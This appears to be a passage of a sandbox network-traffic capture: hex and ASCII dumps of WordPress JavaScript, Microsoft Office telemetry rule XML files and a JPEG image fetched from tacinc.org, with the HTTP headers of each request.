                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 29 2c 74 68 69 73 2e 68 61 73 46 69 6c 74 65 72 3d 73 28 74 68 69 73 2c 22 66 69 6c 74 65 72 73 22 29 2c 74 68 69 73 2e 72 65 6d 6f 76 65 41 6c 6c 41 63 74 69 6f 6e 73 3d 69 28 74 68 69 73 2c 22 61 63 74 69 6f 6e 73 22 2c 21 30 29 2c 74 68 69 73 2e 72 65 6d 6f 76 65 41 6c 6c 46 69 6c 74 65 72 73 3d 69 28 74 68 69 73 2c 22 66 69 6c 74 65 72 73 22 2c 21 30 29 2c 74 68 69 73 2e 64 6f 41 63 74 69 6f 6e 3d 63 28 74 68 69 73 2c 22 61 63 74 69 6f 6e 73 22 29 2c 74 68 69 73 2e 61 70 70 6c 79 46 69 6c 74 65 72 73 3d 63 28 74 68 69 73 2c 22 66 69 6c 74 65 72 73 22 2c 21 30 29 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 41 63 74 69 6f 6e 3d 6c 28 74 68 69 73 2c 22 61 63 74 69 6f 6e 73 22 29 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 46 69 6c 74 65 72 3d 6c 28 74 68 69 73 2c
                                                                                                                                                                                                                              Data Ascii: ),this.hasFilter=s(this,"filters"),this.removeAllActions=i(this,"actions",!0),this.removeAllFilters=i(this,"filters",!0),this.doAction=c(this,"actions"),this.applyFilters=c(this,"filters",!0),this.currentAction=l(this,"actions"),this.currentFilter=l(this,
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 29 7b 69 66 28 28 73 3d 74 5b 6e 5d 29 2e 6b 65 79 73 29 66 6f 72 28 72 3d 65 5b 64 5d 2c 6f 3d 30 3b 6f 3c 73 2e 6b 65 79 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 7b 69 66 28 6e 75 6c 6c 3d 3d 72 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 61 28 27 5b 73 70 72 69 6e 74 66 5d 20 43 61 6e 6e 6f 74 20 61 63 63 65 73 73 20 70 72 6f 70 65 72 74 79 20 22 25 73 22 20 6f 66 20 75 6e 64 65 66 69 6e 65 64 20 76 61 6c 75 65 20 22 25 73 22 27 2c 73 2e 6b 65 79 73 5b 6f 5d 2c 73 2e 6b 65 79 73 5b 6f 2d 31 5d 29 29 3b 72 3d 72 5b 73 2e 6b 65 79 73 5b 6f 5d 5d 7d 65 6c 73 65 20 72 3d 73 2e 70 61 72 61 6d 5f 6e 6f 3f 65 5b 73 2e 70 61 72 61 6d 5f 6e 6f 5d 3a 65 5b 64 2b 2b 5d 3b 69 66 28 69 2e 6e 6f 74 5f 74 79 70 65 2e 74 65 73 74 28 73 2e 74 79 70 65 29 26 26 69
                                                                                                                                                                                                                              Data Ascii: ){if((s=t[n]).keys)for(r=e[d],o=0;o<s.keys.length;o++){if(null==r)throw new Error(a('[sprintf] Cannot access property "%s" of undefined value "%s"',s.keys[o],s.keys[o-1]));r=r[s.keys[o]]}else r=s.param_no?e[s.param_no]:e[d++];if(i.not_type.test(s.type)&&i
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 22 3a 72 3d 28 70 61 72 73 65 49 6e 74 28 72 2c 31 30 29 3e 3e 3e 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 58 22 3a 72 3d 28 70 61 72 73 65 49 6e 74 28 72 2c 31 30 29 3e 3e 3e 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 7d 69 2e 6a 73 6f 6e 2e 74 65 73 74 28 73 2e 74 79 70 65 29 3f 67 2b 3d 72 3a 28 21 69 2e 6e 75 6d 62 65 72 2e 74 65 73 74 28 73 2e 74 79 70 65 29 7c 7c 63 26 26 21 73 2e 73 69 67 6e 3f 66 3d 22 22 3a 28 66 3d 63 3f 22 2b 22 3a 22 2d 22 2c 72 3d 72 2e 74 6f 53 74 72 69 6e 67 28 29 2e 72 65 70 6c 61 63 65 28 69 2e 73 69 67 6e 2c 22 22 29 29 2c 75 3d 73 2e 70 61 64 5f 63 68 61 72 3f 22 30 22 3d 3d 3d 73 2e 70 61 64 5f 63 68 61 72 3f 22 30 22 3a 73 2e 70 61 64
                                                                                                                                                                                                                              Data Ascii: ":r=(parseInt(r,10)>>>0).toString(16);break;case"X":r=(parseInt(r,10)>>>0).toString(16).toUpperCase()}i.json.test(s.type)?g+=r:(!i.number.test(s.type)||c&&!s.sign?f="":(f=c?"+":"-",r=r.toString().replace(i.sign,"")),u=s.pad_char?"0"===s.pad_char?"0":s.pad
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 66 3d 61 2c 65 2e 76 73 70 72 69 6e 74 66 3d 6f 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 28 77 69 6e 64 6f 77 2e 73 70 72 69 6e 74 66 3d 61 2c 77 69 6e 64 6f 77 2e 76 73 70 72 69 6e 74 66 3d 6f 2c 76 6f 69 64 20 30 3d 3d 3d 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 73 70 72 69 6e 74 66 3a 61 2c 76 73 70 72 69 6e 74 66 3a 6f 7d 7d 2e 63 61 6c 6c 28 65 2c 72 2c 65 2c 74 29 29 7c 7c 28 74 2e 65 78 70 6f 72 74 73 3d 6e 29 29 7d 28 29 7d 7d 2c 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 6e 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 69 29 72 65 74 75 72 6e 20 69 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 61 3d 65 5b 6e 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b
                                                                                                                                                                                                                              Data Ascii: f=a,e.vsprintf=o,"undefined"!=typeof window&&(window.sprintf=a,window.vsprintf=o,void 0===(n=function(){return{sprintf:a,vsprintf:o}}.call(e,r,e,t))||(t.exports=n))}()}},e={};function r(n){var i=e[n];if(void 0!==i)return i.exports;var a=e[n]={exports:{}};
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 73 2c 73 2e 6e 65 78 74 3d 72 29 3a 6e 3d 73 2c 69 3d 3d 3d 65 2e 6d 61 78 53 69 7a 65 3f 28 6e 3d 6e 2e 70 72 65 76 29 2e 6e 65 78 74 3d 6e 75 6c 6c 3a 69 2b 2b 2c 72 3d 73 2c 73 2e 76 61 6c 7d 72 65 74 75 72 6e 20 65 3d 65 7c 7c 7b 7d 2c 61 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 3d 6e 75 6c 6c 2c 6e 3d 6e 75 6c 6c 2c 69 3d 30 7d 2c 61 7d 28 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 74 2c 2e 2e 2e 72 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 65 28 29 2e 73 70 72 69 6e 74 66 28 74 2c 2e 2e 2e 72 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 26 26 69 28 22 73 70 72 69 6e 74 66 20 65 72 72 6f 72 3a 20 5c 6e 5c 6e 22 2b 65 2e 74 6f 53 74 72 69 6e
                                                                                                                                                                                                                              Data Ascii: s,s.next=r):n=s,i===e.maxSize?(n=n.prev).next=null:i++,r=s,s.val}return e=e||{},a.clear=function(){r=null,n=null,i=0},a}(console.error);function a(t,...r){try{return e().sprintf(t,...r)}catch(e){return e instanceof Error&&i("sprintf error: \n\n"+e.toStrin
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 73 2c 6c 3d 5b 5d 3b 66 6f 72 28 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 69 66 28 6f 3d 74 5b 72 5d 2c 61 3d 70 5b 6f 5d 29 7b 66 6f 72 28 6e 3d 61 2e 6c 65 6e 67 74 68 2c 69 3d 41 72 72 61 79 28 6e 29 3b 6e 2d 2d 3b 29 69 5b 6e 5d 3d 6c 2e 70 6f 70 28 29 3b 74 72 79 7b 73 3d 61 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 69 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 74 7d 7d 65 6c 73 65 20 73 3d 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6f 29 3f 65 5b 6f 5d 3a 2b 6f 3b 6c 2e 70 75 73 68 28 73 29 7d 72 65 74 75 72 6e 20 6c 5b 30 5d 7d 28 65 2c 74 29 7d 7d 76 61 72 20 66 3d 7b 63 6f 6e 74 65 78 74 44 65 6c 69 6d 69 74 65 72 3a 22 04 22 2c 6f 6e 4d 69 73 73 69 6e 67 4b 65 79 3a 6e 75 6c 6c 7d 3b 66 75 6e 63 74 69 6f 6e 20 64
                                                                                                                                                                                                                              Data Ascii: s,l=[];for(r=0;r<t.length;r++){if(o=t[r],a=p[o]){for(n=a.length,i=Array(n);n--;)i[n]=l.pop();try{s=a.apply(null,i)}catch(t){return t}}else s=e.hasOwnProperty(o)?e[o]:+o;l.push(s)}return l[0]}(e,t)}}var f={contextDelimiter:"",onMissingKey:null};function d
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 74 22 2c 65 2c 72 2c 69 2c 61 29 3d 3e 28 6e 2e 64 61 74 61 5b 74 5d 7c 7c 6f 28 76 6f 69 64 20 30 2c 74 29 2c 6e 2e 64 63 6e 70 67 65 74 74 65 78 74 28 74 2c 65 2c 72 2c 69 2c 61 29 29 2c 75 3d 28 74 3d 22 64 65 66 61 75 6c 74 22 29 3d 3e 74 2c 70 3d 28 74 2c 65 2c 6e 29 3d 3e 7b 6c 65 74 20 69 3d 6c 28 6e 2c 65 2c 74 29 3b 72 65 74 75 72 6e 20 72 3f 28 69 3d 72 2e 61 70 70 6c 79 46 69 6c 74 65 72 73 28 22 69 31 38 6e 2e 67 65 74 74 65 78 74 5f 77 69 74 68 5f 63 6f 6e 74 65 78 74 22 2c 69 2c 74 2c 65 2c 6e 29 2c 72 2e 61 70 70 6c 79 46 69 6c 74 65 72 73 28 22 69 31 38 6e 2e 67 65 74 74 65 78 74 5f 77 69 74 68 5f 63 6f 6e 74 65 78 74 5f 22 2b 75 28 6e 29 2c 69 2c 74 2c 65 2c 6e 29 29 3a 69 7d 3b 69 66 28 74 26 26 73 28 74 2c 65 29 2c 72 29 7b 63 6f 6e 73
                                                                                                                                                                                                                              Data Ascii: t",e,r,i,a)=>(n.data[t]||o(void 0,t),n.dcnpgettext(t,e,r,i,a)),u=(t="default")=>t,p=(t,e,n)=>{let i=l(n,e,t);return r?(i=r.applyFilters("i18n.gettext_with_context",i,t,e,n),r.applyFilters("i18n.gettext_with_context_"+u(n),i,t,e,n)):i};if(t&&s(t,e),r){cons


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              134192.168.2.64987413.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:13 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                                              x-ms-request-id: 1c36e671-f01e-0096-085a-2310ef000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180413Z-17fbfdc98bbkw9phumvsc7yy8w0000000670000000000vts
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              135192.168.2.64987513.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:13 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 474
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                                              x-ms-request-id: ba028032-401e-00ac-39db-200a97000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180413Z-r1755647c66z4pt7cv1pnqayy400000008m00000000065tr
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              136192.168.2.64987613.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:13 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 408
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                                              x-ms-request-id: ae9ee863-001e-000b-78d3-2015a7000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180413Z-r1755647c66lljn2k9s29ch9ts00000008q00000000014ex
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              137192.168.2.649880141.193.213.114431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC634OUTGET /wp-content/uploads/2020/11/wave-background-dark.jpg HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC481INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:13 GMT
                                                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                                                              Content-Length: 9727
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                              Cf-Polished: status=not_needed
                                                                                                                                                                                                                              ETag: "66f49b7a-25ff"
                                                                                                                                                                                                                              Last-Modified: Wed, 25 Sep 2024 23:23:38 GMT
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614823
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5f74a062cbe-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC888INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 07 07 07 07 07 07 08 08 08 08 0b 0b 0a 0b 0b 10 0e 0d 0d 0e 10 18 11 12 11 12 11 18 24 16 1a 16 16 1a 16 24 20 26 1f 1d 1f 26 20 39 2d 27 27 2d 39 42 37 34 37 42 4f 47 47 4f 64 5f 64 83 83 b0 01 07 07 07 07 07 07 08 08 08 08 0b 0b 0a 0b 0b 10 0e 0d 0d 0e 10 18 11 12 11 12 11 18 24 16 1a 16 16 1a 16 24 20 26 1f 1d 1f 26 20 39 2d 27 27 2d 39 42 37 34 37 42 4f 47 47 4f 64 5f 64 83 83 b0 ff c2 00 11 08 02 c4 05 a0 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 05 06 04 07 ff da 00 08 01 01 00 00 00 00 fe 14 06 80 28 02 80 50 0a 00 a0 14 03 40 05 01 40 00 14 0a 00 28 05 00 d0 02 80 50 05 0f 28 06 80 28 02 80 50 0a 01 40 14 03 40
                                                                                                                                                                                                                              Data Ascii: JFIF$$ && 9-''-9B747BOGGOd_d$$ && 9-''-9B747BOGGOd_d"(P@@(P((P@@
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC1369INData Raw: 14 00 01 40 a0 02 80 50 0d 00 2f 98 00 00 00 0d 00 28 05 00 a0 0a 01 40 28 03 40 0a 02 80 00 28 0a 00 28 05 00 d0 0b db c6 00 00 00 01 a0 0a 01 40 14 02 80 50 0a 00 d0 01 40 a0 00 05 02 80 14 01 40 34 1b ed d1 e0 00 00 00 00 d0 02 80 50 0a 00 a0 14 02 80 34 00 a0 28 00 02 80 a0 02 80 50 0d 3a f6 d0 f0 00 00 00 00 1a 00 a0 14 02 80 28 05 00 a0 0d 00 28 0a 00 00 50 28 01 40 14 0d 76 ed 41 e0 00 00 00 00 34 00 a0 14 02 80 28 05 00 a0 0d 00 28 0a 00 00 a0 28 00 a0 14 6f b7 52 83 c0 00 00 00 00 1a 00 a0 14 02 80 28 05 00 a0 0d 00 28 0a 00 00 50 28 01 40 17 a7 6e 80 a1 e0 00 00 00 00 0d 00 28 05 00 a0 0a 01 40 28 03 40 0a 02 80 00 28 0a 00 28 2f 5e db 00 a3 c0 00 00 00 00 06 80 28 05 00 a0 0a 01 40 28 03 40 0a 02 80 14 aa aa 28 11 10 17 af 7a 50 0a 78 00 00 00
                                                                                                                                                                                                                              Data Ascii: @P/(@(@((@P@@4P4(P:((P(@vA4(((oR((P(@n(@(@((/^(@(@(zPx
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC1369INData Raw: a0 14 2f 7e e2 8a 00 05 00 00 2f cc 00 df 6d 00 00 00 00 00 00 00 14 a0 00 0a 4e 7c c0 1d 7b 50 0a 00 01 7b f7 a0 a0 00 00 0a 00 af 9a 82 de dd 00 00 00 00 00 00 00 00 00 00 0b 49 cf 9d 0b df 60 0a 00 2c 57 7e d4 0a 00 50 00 a0 00 7c d0 df 6d 80 00 00 00 00 00 00 00 00 00 0a 03 9e 2b 5d aa 80 a0 00 5e bf a3 41 14 00 0a 00 0a 00 3e 6d 7b 74 00 00 00 00 00 00 00 00 16 50 00 01 42 63 5d 40 05 21 40 75 ef b0 02 80 14 08 14 00 07 ce f4 eb 40 00 00 00 00 00 00 00 00 28 00 02 86 bb b9 e4 00 50 03 a7 7e 80 00 0a 00 0a 00 28 0f 16 81 60 16 01 60 16 01 60 16 01 60 16 00 50 00 00 2f 4e a1 cb 20 16 80 6b f4 74 00 05 02 80 00 02 80 1e 42 59 42 59 42 59 42 59 42 59 42 59 42 59 42 59 42 59 40 05 8b 2a 59 41 db a0 19 c6 40 00 d7 7e a0 00 0a 05 00 00 d0 22 83 c8 00 00 00
                                                                                                                                                                                                                              Data Ascii: /~/mN|{P{I`,W~P|m+]^A>m{tPBc]@!@u@(P~(````P/N ktBYBYBYBYBYBYBYBYBY@*YA@~"
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC1369INData Raw: 46 ad 00 16 e8 06 80 0a 38 ed a0 00 00 00 15 28 02 4d 14 01 75 40 0d 00 2a 72 e8 00 00 00 00 00 29 6c 81 44 ba a5 00 0b 40 39 80 00 00 00 02 80 1a a2 40 ad 50 50 00 d0 07 28 00 00 00 00 0d 01 a1 44 86 a8 28 a8 a0 2d 03 94 00 00 00 00 01 69 a0 0b 1a 00 50 28 0d 01 ca 00 00 00 00 00 35 a0 05 de f3 80 02 82 80 d0 39 49 49 49 49 49 49 49 49 49 49 4d 8a 06 bd 05 c6 40 14 05 01 a6 79 80 00 00 00 00 2e c0 17 d3 41 53 ce 50 0a 00 a0 73 00 00 00 00 00 bb 00 6f 74 0a 63 20 05 00 50 e6 00 00 00 00 03 5a 85 8a 7a 6c 02 89 8c aa 50 a0 05 39 80 00 00 00 01 74 01 af 45 a0 0a 33 88 14 54 50 17 90 00 00 00 00 2e 80 2f a8 a4 50 15 30 05 02 80 ff c4 00 19 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 08 01 03 10 00 00 00 f9 a0 20 00 03 20 00
                                                                                                                                                                                                                              Data Ascii: F8(Mu@*r)lD@9@PP(D(-iP(59IIIIIIIIIIM@y.ASPsotc PZzlP9tE3TP./P0
